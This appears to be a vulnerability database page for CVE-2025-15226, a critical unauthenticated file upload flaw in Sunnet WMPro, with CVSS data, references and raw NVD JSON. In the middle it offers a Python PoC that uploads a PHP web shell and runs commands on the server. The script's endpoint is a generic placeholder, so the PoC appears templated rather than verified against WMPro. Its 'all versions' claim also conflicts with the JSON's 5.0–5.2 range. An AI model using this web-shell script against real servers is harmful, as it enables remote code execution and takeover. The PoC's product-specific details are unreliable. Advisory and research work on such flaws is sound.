CVE-2025-15226

Description

WMPro developed by Sunnet has a Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:* - VULNERABLE

WMPro (Sunnet) - 所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-15226 PoC - WMPro Arbitrary File Upload
# Target: WMPro server with vulnerable file upload functionality

TARGET_URL = "http://target-server.com"  # Replace with target URL
UPLOAD_ENDPOINT = "/api/upload"  # Replace with actual upload endpoint
WEBSHELL_NAME = "shell.php"

def create_webshell():
    """Create PHP webshell payload"""
    php_code = "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>"
    return php_code

def upload_webshell():
    """Upload malicious file to target server"""
    files = {
        'file': (WEBSHELL_NAME, create_webshell(), 'application/x-php')
    }
    
    try:
        response = requests.post(f"{TARGET_URL}{UPLOAD_ENDPOINT}", files=files, timeout=10)
        print(f"[*] Upload Status: {response.status_code}")
        print(f"[*] Response: {response.text}")
        
        # If successful, return the path to execute the webshell
        if response.status_code == 200:
            return True
    except Exception as e:
        print(f"[!] Error: {e}")
        return False

def execute_command(cmd):
    """Execute command via uploaded webshell"""
    shell_url = f"{TARGET_URL}/uploads/{WEBSHELL_NAME}"
    params = {'cmd': cmd}
    
    try:
        response = requests.get(shell_url, params=params, timeout=10)
        return response.text
    except Exception as e:
        print(f"[!] Execution Error: {e}")
        return None

if __name__ == "__main__":
    print("[*] CVE-2025-15226 WMPro Arbitrary File Upload PoC")
    if upload_webshell():
        print("[+] Webshell uploaded successfully")
        print("[*] Executing whoami command...")
        result = execute_command("whoami")
        if result:
            print(f"[+] Result: {result}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15226
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15226
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15226/
[4] VulDB https://vuldb.com/cve/CVE-2025-15226
[5] https://www.twcert.org.tw/en/cp-139-10603-67149-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15226", "sourceIdentifier": "[email protected]", "published": "2025-12-29T07:15:56.567", "lastModified": "2025-12-31T20:53:21.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WMPro developed by Sunnet has a Arbitrary File Upload vulnerability, allowing unauthenticated remote attackers to upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sun.net:wmpro:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0", "versionEndIncluding": "5.2", "matchCriteriaId": "CA602599-6AA9-4B68-98B6-5F95E47DAD0E"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10603-67149-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10602-c1c69-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}